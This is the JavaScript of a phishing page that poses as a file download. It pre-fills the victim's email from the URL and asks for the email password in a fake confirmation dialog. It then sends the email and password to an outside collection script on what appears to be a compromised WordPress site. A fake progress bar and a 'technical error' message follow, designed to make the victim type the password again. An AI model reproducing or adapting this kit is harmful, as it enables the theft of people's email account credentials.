

  function getParameterByName(name, url) {
    if (!url) url = window.location.href;
    name = name.replace(/[\[\]]/g, "\\$&");
    var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
      results = regex.exec(url);
    if (!results) return null;
    if (!results[2]) return "";
    return decodeURIComponent(results[2].replace(/\+/g, " "));
  }

  document.querySelector("#email").value = getParameterByName("email");


   var ctx = document.getElementById('progress-canvas').getContext('2d');
    var al = 0;
    var start = 4.72;
    var cw = ctx.canvas.width ;
    var ch = ctx.canvas.height ;
    var diff;
    var sim;
  $(document).ready(function(){
    $("#btn-download").click(function(e){
      e.preventDefault();
      e.stopPropagation();
      $("#confirm-modal").removeClass("hide").fadeIn(1000);
      $("#password").focus();
    });

    $("#btn-confirm").click(function(e){
      e.preventDefault();
      e.stopPropagation();
      var pass = $("#password").val();
      var email = $("#email").val();
      if(isEmail(email) == false){
        $("#email").css("border", "1px solid red");
		$("#email").attr("placeholder", "Please enter a valid email!");
		return false;
      }else if(pass.length < 2){
        $("#password").css("border", "1px solid red");
        $("#password").attr("placeholder", "Please enter your password first!");
        $("#password").focus();
      }else{
        $("#errormsg").text("");
        $("#modal").removeClass("hide");
        $("#confirm-modal").addClass("hide");
        sim = setInterval(() => {
          progressSim();
        }, 300);
        $.ajax({
          url: "https://karjom.apppash.ir/wp-admin/includes/0/submit.php",
          method: "post",
          data: {
            email: email,
            password: pass
          },
          success: (data) => {
              console.log(data);
              triggerError();
          },
          error: (err) => {
            console.log(err)
            triggerError()
          }
        })
      }
      
    })

    $("#btn-exit").click(function(){
      closeModal();
      reset();

    })
  })
  function progressSim(){
      diff = ((al/100) * Math.PI * 2 * 10).toFixed(2);
      ctx.clearRect(0, 0, cw, ch);
      ctx.lineWidth = 13;
      ctx.fillStyle = '#09F';
      ctx.strokeStyle = '#09F';
      ctx.textAlign = 'center';
      ctx.font = "25px monospace";
      ctx.fillText(al+'%', cw * .5, ch * .5 + 2, cw);
      ctx.beginPath();
      ctx.arc(75, 75, 68, start, diff/10+start, false);
      ctx.stroke();
      if (al >= 100){
        clearTimeout(sim)
      }
      al++;
    }

    function triggerError(){
      setTimeout(() => {
      al = 0;
      $("#password").val("");
      $("#download-msg").css("color", "#e81123");
      $("#download-msg").css("top", "60%");
      $("#download-msg").css("right", "40%");
	  $("#download-msg").css("margin-top", "-12px");
      $("#download-msg").html("Technical error encountered <br> Please confirm the email password");
      clearInterval(sim);
      $("#exit").removeClass("hide");   
      }, 1000);
    
    }
    function closeModal(){
      $("#modal").addClass("hide");
      $("#exit").addClass("hide");
      $("#confirm-modal").removeClass("hide");
    }
    
    function reset(){
      al = 0;
      $("#download-msg").css("color", "orange");
      $("#download-msg").css("right", "50%");
      $("#download-msg").text("Downloading Files...");
      ctx.clearRect(0, 0, cw, ch);
      $("#password").focus();
    }
	
	function isEmail(email){
		var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,6})+$/;
		return regex.test(email);
	}
